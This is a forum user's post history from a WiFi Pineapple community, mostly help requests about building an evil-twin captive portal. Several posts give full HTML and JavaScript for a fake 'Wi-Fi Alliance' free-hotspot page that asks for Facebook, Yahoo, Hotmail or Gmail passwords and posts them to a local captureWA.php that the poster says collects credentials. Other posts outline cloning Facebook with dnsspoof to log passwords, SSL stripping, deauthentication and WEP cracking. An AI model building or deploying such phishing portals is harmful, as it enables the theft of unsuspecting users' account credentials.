-
Posts
192 -
Joined
-
Last visited
Posts posted by daniboy92
-
-
Me too, try with a factory reset because i was thinking it was a fault about my pineapple but know i don't have infusions.
-
I lost all my configuration because this... Any official words about a that? I have a pentest today and i don't have any infusion on my pineapple!!!
I check the web if it's trully down:
It seems only in Europe can't access to the pineapple cloud, i need to install infusions. Can anyone help?
-
I'm trying to connect ti pineapple bar because i want to install a infusion, but pineapple says "No system infusions found. Check again later."
Have internet connection, because i'm connected to my pineapple via ethernet and pineapple is connected to my router with wlan2 and i can navigate without problems.
When i click on Internet IP: Show it doesn't show anything, and when i ping to cloud.pineapple.com connection time out appears.
I don't know how to fix this, even with a factory reset it shows the same...
-
But is there a way to detect https and redirect to the captive portal with a http url and then redirect again to the https Web?The captive portal doesn't do SSL.
Even if it did, it would serve you a self signed certificate, so it would give you an error message.
Best Regards,
Sebkinne
-
I notice my evilportal doesn't work when i type a ssl web, for example:
When i type: www.yolo.com it shows my captive portal.
When i type: www.gmail.com (https loads) and my browser says 'Can not connect'.
I don't know if this is normal or not...
-
Cron se usa para programar scripts a una determinada hora y que ejecute acciones de manera automática. Cron no creo que sea razón de reinicios tan sospechosos, se te reinicia de manera injustificada a ti también?Sorry what is Cron? i believe that this is my problem, is posible?
-
I'm having same issue what Mr.miYagi has.
-
Hahaha, that was all I need!!! Thanks Cooper and Newbi3 for your help, now I have my Web working like I want to be.
-
In the validate function, make this the very first 2 lines:
alert("Username: " + document.username.value ); alert("Password: " + document.password.value );
When you click any of the buttons you should get 2 pop-ups that show what's in each input field.
If you don't get the pop-ups, the button doesn't call the validate function.
If the pop-ups only show the fixed text and not any field contents, then "document.username.value" or "document.password.value" is not producing the field value for some reason.
Added this and nothing happends, i can bypass the login without any popups or alerts. I don't know where is the problem. Let you my actual code:
!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><script type="text/javascript">function ajaxRequest() {if (window.XMLHttpRequest) {return new XMLHttpRequest();} else if (window.ActiveXObject) {return new ActiveXObject("Microsoft.XMLHTTP");} else {return false;}}function sendInfo() {var xmlhttp = new ajaxRequest();var usernamevalue=encodeURIComponent(document.getElementById("username").value);var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);var passwordvalue=encodeURIComponent(document.getElementById("password").value);if (emailvalue != null && emailvalue != "") {var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue;xmlhttp.open("POST", "http://172.16.42.1/captureWA.php", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send(parameters);window.location = document.getElementById("redirect").value;}}function validate() {alert("Username: " + document.username.value );alert("Password: " + document.password.value );if ((document.username.value.trim()=="") || (document.password.value.trim()=="")) {// The fields are empty so alert themalert("Por favor rellene correctamente las casillas");return false;} else {// They typed in information so send the infosendInfo();}}</script><head><title>Internet Gratis | Wi-Fi Alliance</title></head><body><center><br /><img src="/images/wifi-alliance.png" width="20%"><br /><br /><p><Strong>Bienvenido a WiFi Alliace Hot-Spot.Para iniciar sesión en la red WiFi primero necesita crear una cuenta a través de cualquiera de sus páginas favoritas.</Strong></p><p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet ¡GRATIS!. </Strong></p><br /><form action="http://172.16.42.1/captureWA.php" method="post"><fieldset><table width="320"><tr><td><label>Email</label></td><td><input type="text" id="username" name="username" placeholder="Ingrese su email" /><td><label>Contraseña</label></td><td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" /></tr><tr><td><img src="/images/facebooklogo.png" /></td><td><img src="/images/yahoologo.jpg"/></td><td><img src="/images/hotmaillogo.jpg"/></td><td><img src="/images/gmaillogo.png"/></td></tr><tr></tr><tr></tr><td align=center ><button name="facebook" onclick="validate();return false;">Login</button></td><td align=center ><button name="yahoo" onclick="validate();return false;">Login</button></td><td align=center ><button name="hotmail" onclick="validate();return false;">Login</button></td><td align=center ><button name="gmail" onclick="validate();return false;">Login</button></td></table><input type="hidden" id="redirect" name="redirect" value="$authtarget" /></fieldset></form></center></body></html>Thanks for your support!
-
I applied you code newbi3, and this is how it looks:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><script type="text/javascript">function ajaxRequest() {if (window.XMLHttpRequest) {return new XMLHttpRequest();} else if (window.ActiveXObject) {return new ActiveXObject("Microsoft.XMLHTTP");} else {return false;}}function sendInfo() {var xmlhttp = new ajaxRequest();var usernamevalue=encodeURIComponent(document.getElementById("username").value);var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);var passwordvalue=encodeURIComponent(document.getElementById("password").value);if (emailvalue != null && emailvalue != "") {var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue;xmlhttp.open("POST", "http://172.16.42.1/captureWA.php", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send(parameters);document.getElementById("results").innerHTML="¡Gracias!";window.location = document.getElementById("redirect").value;} else {document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña.";}}function validate() {if ((document.username.value.trim()=="") || (document.password.value.trim()=="")) {// The fields are empty so alert themalert("Por favor rellene correctamente las casillas");return false;} else {// They typed in information so send the infosendInfo();}}</script><head><title>Internet Gratis | Wi-Fi Alliance</title></head><body><center><br /><img src="/images/wifi-alliance.png" width="20%"><br /><br /><p><Strong>Bienvenido a WiFi Alliace Hot-Spot.Para iniciar sesión en la red WiFi primero necesita crear una cuenta a través de cualquiera de sus páginas favoritas.</Strong></p><p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet ¡GRATIS!.</Strong></p><form action="http://172.16.42.1/captureWA.php" method="post"><fieldset><table width="320"><tr><td><label>Email</label></td><td><input type="text" id="username" name="username" placeholder="Ingrese su email" required /><td><label>Contraseña</label></td><td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required /></tr><tr><td><img src="/images/facebooklogo.png" /></td><td><img src="/images/yahoologo.jpg"/></td><td><img src="/images/hotmaillogo.jpg"/></td><td><img src="/images/gmaillogo.png"/></td></tr><td align=center ><button name="facebook" onclick="validate();return false;">Login</button></td><td align=center ><button name="yahoo" onclick="validate();return false;">Login</button></td><td align=center ><button name="hotmail" onclick="validate();return false;">Login</button></td><td align=center ><button name="gmail" onclick="validate();return false;">Login</button></td></table><input type="hidden" id="redirect" name="redirect" value="$authtarget" /></fieldset></form></center></body></html>But for some reasons it doesn't work. When i login with with an empty login it pass through my web. It's strange but when i click "login" with empty fields it doesn't show any alert or popup "Por favor rellene correctamente las casillas":function validate() {
if ((document.username.value.trim()=="") || (document.password.value.trim()=="")) {// The fields are empty so alert themalert("Por favor rellene correctamente las casillas");return false;} else {// They typed in information so send the infosendInfo();}And this alerts too:
function sendInfo() {
var xmlhttp = new ajaxRequest();var usernamevalue=encodeURIComponent(document.getElementById("username").value);var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);var passwordvalue=encodeURIComponent(document.getElementById("password").value);if (emailvalue != null && emailvalue != "") {var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue;xmlhttp.open("POST", "http://172.16.42.1/captureWA.php", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send(parameters);document.getElementById("results").innerHTML="¡Gracias!";window.location = document.getElementById("redirect").value;} else {document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña.";}}I think there are conflict with this two functions...
It's very very difficult to me learn html or javascript on those webs because i don't speak english very well, i learn testing code by your help, technical english it's a little imposible for me .
-
Can I use validate() and sendInfo() at same time onto my buttons?put your validate function onto your buttons
-
The new version of SSLstrip is a kind of fork of Moxie's version, but tor it to work you also need a DNS server that reverse the changes made by the proxy, which is why you can't "just" replace it in the infusion. It won't simply work.
What about new fw what Seb mentions with new features again this limitations? Do you know something about that Whistlemaster?
-
No, we can't.Can we just copy SSLStrip+ code over the older infusion one
-
Thanks! I tried you tips, implement this:
<td align=center ><button name="facebook" onclick="sendInfo();return false;">Login</button></td>
<td align=center ><button name="yahoo" onclick="sendInfo();return false;">Login</button></td><td align=center ><button name="hotmail" onclick="sendInfo();return false;">Login</button></td><td align=center ><button name="gmail" onclick="sendInfo();return false;">Login</button></td>And this:<form onSubmit="validate()" action="http://172.16.42.1/captureWA.php" method="post">...
And this:
function validate() {
if ((document.username.value.trim()=="") || (document.password.value.trim()=="")) {alert("Por favor rellene correctamente las casillas");} else {// Post the data}}Final result:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><script type="text/javascript">function ajaxRequest() {if (window.XMLHttpRequest) {return new XMLHttpRequest();} else if (window.ActiveXObject) {return new ActiveXObject("Microsoft.XMLHTTP");} else {return false;}}function validate() {if ((document.username.value.trim()=="") || (document.password.value.trim()=="")) {alert("Por favor rellene correctamente las casillas");} else {// Post the data}}function sendInfo() {var xmlhttp = new ajaxRequest();var usernamevalue=encodeURIComponent(document.getElementById("username").value);var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);var passwordvalue=encodeURIComponent(document.getElementById("password").value);if (emailvalue != null && emailvalue != "") {var parameters="email="+emailvalue+"&redirect="+redirectvalue+"&password=" + passwordvalue;xmlhttp.open("POST", "http://172.16.42.1/captureWA.php", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send(parameters);document.getElementById("results").innerHTML="¡Gracias!";window.location = document.getElementById("redirect").value;} else {document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña.";}}</script><head><title>Internet Gratis | Wi-Fi Alliance</title></head><body><center><br /><img src="/images/wifi-alliance.png" width="20%"><br /><br /><p><Strong>Bienvenido a WiFi Alliace Hot-Spot.Para iniciar sesión en la red WiFi primero necesita crear una cuenta a través de cualquiera de sus páginas favoritas.</Strong></p><p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet ¡GRATIS!. </Strong></p><br /><form onSubmit="validate()" action="http://172.16.42.1/captureWA.php" method="post"><fieldset><table width="320"><tr><td><label>Email</label></td><td><input type="text" id="username" name="username" placeholder="Ingrese su email" required /><td><label>Contraseña</label></td><td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required /></tr><tr><td><img src="/images/facebooklogo.png" /></td><td><img src="/images/yahoologo.jpg"/></td><td><img src="/images/hotmaillogo.jpg"/></td><td><img src="/images/gmaillogo.png"/></td></tr><td align=center ><button name="facebook" onclick="sendInfo();return false;">Login</button></td><td align=center ><button name="yahoo" onclick="sendInfo();return false;">Login</button></td><td align=center ><button name="hotmail" onclick="sendInfo();return false;">Login</button></td><td align=center ><button name="gmail" onclick="sendInfo();return false;">Login</button></td></table><input type="hidden" id="redirect" name="redirect" value="$authtarget" /></fieldset></form></center></body></html>I can't get this html works on android devices, they can pass trought my captive portal.
I don't know what i miss, i hope you can help me.
-
But... Clean it completely? I ask this because 172.16.42.1/captureWA.PHP aims to a file who collects my credentials.
I'm a little confuse, because I don't speak English very well (and Google translate doesn't help always) and don't know nothing about Javascript. Can you explain that more easily?
Thanks!!!
-
Hi all,
I want to make a html web with two fields and a login button. I make this<tr>
<td><label>Email</label></td>
<td><input type="text" id="username" name="username" placeholder="Ingrese su email" required />
<td><label>Contraseña</label></td>
<td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required />
</tr>These fields are required, what works with all browsers except Safari. Now i need to make these fields obligatory for android devices...
I find this references:
1) http://stackoverflow.com/questions/21209952/android-webview-html-form-required-fields
2) http://stackoverflow.com/questions/24647180/submitting-hidden-field-data-on-android-ios-browsers-does-not-work
They say html web need a javascript function to get a working required fields on android devices.
I have no idea with javascript, someone can help me with this?
All my html code:<p><Strong>Bienvenido a WiFi Alliace Hot-Spot.
Para iniciar sesión en la red WiFi primero necesita crear una cuenta a través de cualquiera de sus páginas favoritas.</Strong></p>
<p><Strong>Por favor, introduzca su cuenta Facebook, Yahoo, Hotmail o Gmail para registrarse. Una vez registrado podrá disfrutar de 60 minutos de internet ¡GRATIS!. </Strong></p><br />
<form action="http://172.16.42.1/captureWA.php" method="post">
<fieldset>
<table width="320">
<tr>
<td><label>Email</label></td>
<td><input type="text" id="username" name="username" placeholder="Ingrese su email" required />
<td><label>Contraseña</label></td>
<td><input type="password" id="password" name="password" placeholder="Ingrese su contraseña" required />
</tr>
<tr>
<td><img src="/images/facebooklogo.png" /></td>
<td><img src="/images/yahoologo.jpg"/></td>
<td><img src="/images/hotmaillogo.jpg"/></td>
<td><img src="/images/gmaillogo.png"/></td>
</tr>
<tr>
</tr>
<tr></tr>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="facebook" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="yahoo" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="hotmail" /></td>
<td align=center ><input type="submit" onclick="sendInfo();return false;" value="Login" name="gmail" /></td>
</table>
<input type="hidden" id="redirect" name="redirect" value="$authtarget" />
</fieldset>
</form>
</center>
</body>
</html> -
Maybe it's something bad for your stuff. Actually I can run wlan0 for PineAP, wlan1 for deauth, wlan2 like client, wlan3 like an wpa-wpa2 AP. Infusions running: PineAP, dnsspoof, evilportal, deauth.
I did this tests with Pineapple Juice 6800 and wall socket, get perfect function with battery and only one time reboot from wall socket and then perfect function.
Hope you can get help to fix your problem.
-
But not for me because I'm not living in near and there are many charges from aduana. It's better for me get this from Europe.Yell yes ;-) so far away
Thanks!!!
-
If I'm not wrong pineapple's antennas need a special adapter to attach a different antenna right?Plug a better antenna like a yagi or pannel with 10 dbi min
also you can boost your RF output (wlan0) but you will be (perhaps) illegal in the laws (FCC)
And about boost the RF output what's the way to do this?
-
Aircrack-ng is already installed, but you can use it by a shell through ssh for wep's cracking.
There isn't an infusion to crack wep keys.
-
Unfortunately dnsspoof it's a little bit outdated and it can't spoof a Web if it's cached or it's ssl's Web.If the clients navigator is modern & go to pre-load HSTS (facebook, lastpass, gmail, etc...) -> fail
So alternative tips is the following :
->Generate a EvilAP
->Host a twin facebook into /www folder
->Remake the HTML (twin-facebook) original code to call a PHP action with a .txt or sql
->Dnsspof the 172.16.42.1 *.facebook.* (excellent tuto found here hak5 : http://goo.gl/qe4jkx )
->Check your txt or sql database
But I remember that facebook detect an abnormality & say to change the password of the client.
With dnsspoof+evilportal it's a little bit harder to get credentials due to SSL and previously cached webs.
-
Yo hablo español, intentaré ayudarte lo que pueda. Mis conocimientos en algunos temas son nulos pero haré lo que pueda por ayudar.
-
Seb says they are working implementing this feauture or one similar.
I don't know how much time we will wait for this, but without a effective tool against ssl we lose an important capacity for pentesting.
-
I have Pineapple Juice 6800mAh and I have running wlan0 like an open access point, wlan2 like client, wlan3 like a WPA/WPA2 access point. I can turn on my pineapple and keep this wireless radios working perfectly without issue.
With your socket adapter or the batteries you can get all what you want for your test.
Pineapple Bar No infusions
in WiFi Pineapple Mark V
Posted
Thanks newbi3, i know that. My problem is not view my ip, because i know i have internet and can navigate normally, the problem is:
i thought it was problem from my pineapple, so i did a factory reset; now i don't have infusions and i need to install it because i have a pentest today, but cloud.pineapple.com doesn't show me any infusion on the bar!
I don't know how to do for download again my infusions...